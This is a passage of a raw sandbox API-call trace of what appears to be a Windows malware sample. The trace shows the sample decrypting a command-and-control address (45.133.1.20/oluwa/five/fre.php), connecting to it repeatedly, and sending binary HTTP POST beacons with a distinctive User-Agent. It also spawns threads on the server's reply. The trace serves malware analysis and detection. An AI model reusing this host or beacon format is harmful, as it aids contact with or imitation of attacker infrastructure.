dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0222.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.013] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0222.014] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.014] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0222.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.015] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0222.015] GetProcessHeap () returned 0x6a0000 [0222.015] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.016] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.019] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.026] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.026] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.027] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.028] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.028] GetProcessHeap () returned 0x6a0000 [0222.028] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0222.028] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.028] GetProcessHeap () returned 0x6a0000 [0222.028] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0222.028] GetProcessHeap () returned 0x6a0000 [0222.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.029] GetProcessHeap () returned 0x6a0000 [0222.029] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0222.029] GetProcessHeap () returned 0x6a0000 [0222.029] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0222.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.038] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.038] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0222.048] GetProcessHeap () returned 0x6a0000 [0222.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0222.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.050] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0222.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.054] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.055] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.055] GetProcessHeap () returned 0x6a0000 [0222.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0222.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.057] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0222.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.058] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0222.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.059] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0222.059] GetProcessHeap () returned 0x6a0000 [0222.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.061] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0222.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.065] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0222.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.066] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0222.067] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.067] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0222.067] GetProcessHeap () returned 0x6a0000 [0222.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0222.067] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0222.067] GetProcessHeap () returned 0x6a0000 [0222.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0222.067] socket (af=2, type=1, protocol=6) returned 0x674 [0222.068] connect (s=0x674, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0222.094] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0222.094] GetProcessHeap () returned 0x6a0000 [0222.094] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0222.094] GetProcessHeap () returned 0x6a0000 [0222.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0222.096] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.097] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.097] GetProcessHeap () returned 0x6a0000 [0222.097] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0222.097] GetProcessHeap () returned 0x6a0000 [0222.098] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.098] GetProcessHeap () returned 0x6a0000 [0222.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0222.098] GetProcessHeap () returned 0x6a0000 [0222.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0222.099] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.102] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.102] GetProcessHeap () returned 0x6a0000 [0222.102] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0222.102] GetProcessHeap () returned 0x6a0000 [0222.103] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.103] send (s=0x674, buf=0x6b5c98*, len=242, flags=0) returned 242 [0222.104] send (s=0x674, buf=0x6bb998*, len=159, flags=0) returned 159 [0222.104] GetProcessHeap () returned 0x6a0000 [0222.104] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c5718 [0222.104] recv (in: s=0x674, buf=0x6c5718, len=4048, flags=0 | out: buf=0x6c5718*) returned 204 [0222.195] GetProcessHeap () returned 0x6a0000 [0222.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0222.195] GetProcessHeap () returned 0x6a0000 [0222.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0222.196] GetProcessHeap () returned 0x6a0000 [0222.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0222.198] GetProcessHeap () returned 0x6a0000 [0222.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0222.198] closesocket (s=0x674) returned 0 [0222.198] GetProcessHeap () returned 0x6a0000 [0222.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0222.199] GetProcessHeap () returned 0x6a0000 [0222.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.199] GetProcessHeap () returned 0x6a0000 [0222.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0222.199] GetProcessHeap () returned 0x6a0000 [0222.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0222.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c5718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x9a8) returned 0x674 [0222.201] Sleep (dwMilliseconds=0xea60) [0222.203] GetProcessHeap () returned 0x6a0000 [0222.203] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0222.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.204] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.212] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0222.238] GetProcessHeap () returned 0x6a0000 [0222.238] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0222.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.239] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0222.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.240] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.241] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.242] GetProcessHeap () returned 0x6a0000 [0222.242] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0222.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.245] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0222.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.291] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0222.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.293] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0222.293] GetProcessHeap () returned 0x6a0000 [0222.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.294] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0222.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.295] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0222.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.296] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0222.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.297] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0222.297] GetProcessHeap () returned 0x6a0000 [0222.297] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0222.297] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0222.298] GetProcessHeap () returned 0x6a0000 [0222.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0222.298] GetProcessHeap () returned 0x6a0000 [0222.298] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.298] GetProcessHeap () returned 0x6a0000 [0222.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0222.299] GetProcessHeap () returned 0x6a0000 [0222.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0222.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.300] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0222.315] GetProcessHeap () returned 0x6a0000 [0222.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0222.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.316] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0222.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.317] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.318] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.318] GetProcessHeap () returned 0x6a0000 [0222.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0222.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.324] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0222.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.325] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0222.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.325] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0222.325] GetProcessHeap () returned 0x6a0000 [0222.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.326] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.336] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0222.337] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.338] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0222.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.339] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0222.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.340] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0222.340] GetProcessHeap () returned 0x6a0000 [0222.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0222.340] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0222.340] GetProcessHeap () returned 0x6a0000 [0222.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0222.340] socket (af=2, type=1, protocol=6) returned 0x678 [0222.340] connect (s=0x678, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0222.366] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0222.366] GetProcessHeap () returned 0x6a0000 [0222.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0222.366] GetProcessHeap () returned 0x6a0000 [0222.367] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0222.368] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.369] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0222.369] GetProcessHeap () returned 0x6a0000 [0222.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0222.369] GetProcessHeap () returned 0x6a0000 [0222.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.370] GetProcessHeap () returned 0x6a0000 [0222.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0222.370] GetProcessHeap () returned 0x6a0000 [0222.370] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0222.371] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0222.371] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0222.371] GetProcessHeap () returned 0x6a0000 [0222.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0222.372] GetProcessHeap () returned 0x6a0000 [0222.372] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0222.372] send (s=0x678, buf=0x6b5c98*, len=242, flags=0) returned 242 [0222.373] send (s=0x678, buf=0x6bb998*, len=159, flags=0) returned 159 [0222.373] GetProcessHeap () returned 0x6a0000 [0222.373] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c5718 [0222.373] recv (in: s=0x678, buf=0x6c5718, len=4048, flags=0 | out: buf=0x6c5718*) returned 204 [0222.444] GetProcessHeap () returned 0x6a0000 [0222.444] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0222.446] GetProcessHeap () returned 0x6a0000 [0222.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0222.447] GetProcessHeap () returned 0x6a0000 [0222.447] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0222.447] GetProcessHeap () returned 0x6a0000 [0222.448] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0222.449] closesocket (s=0x678) returned 0 [0222.449] GetProcessHeap () returned 0x6a0000 [0222.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0222.449] GetProcessHeap () returned 0x6a0000 [0222.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0222.450] GetProcessHeap () returned 0x6a0000 [0222.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0222.450] GetProcessHeap () returned 0x6a0000 [0222.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0222.450] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c5718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xd80) returned 0x678 [0222.453] Sleep (dwMilliseconds=0xea60) [0222.454] GetProcessHeap () returned 0x6a0000 [0222.454] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0222.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.457] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0222.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.466] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0222.482] GetProcessHeap () returned 0x6a0000 [0222.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0222.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.483] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0222.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.484] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.486] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.486] GetProcessHeap () returned 0x6a0000 [0222.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0222.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.487] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0222.496] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.497] CryptDestroyKey (hKey=0x6ad020) returned 1 [0222.498] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.498] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0222.499] GetProcessHeap () returned 0x6a0000 [0222.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0222.502] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0222.502] StrStrA 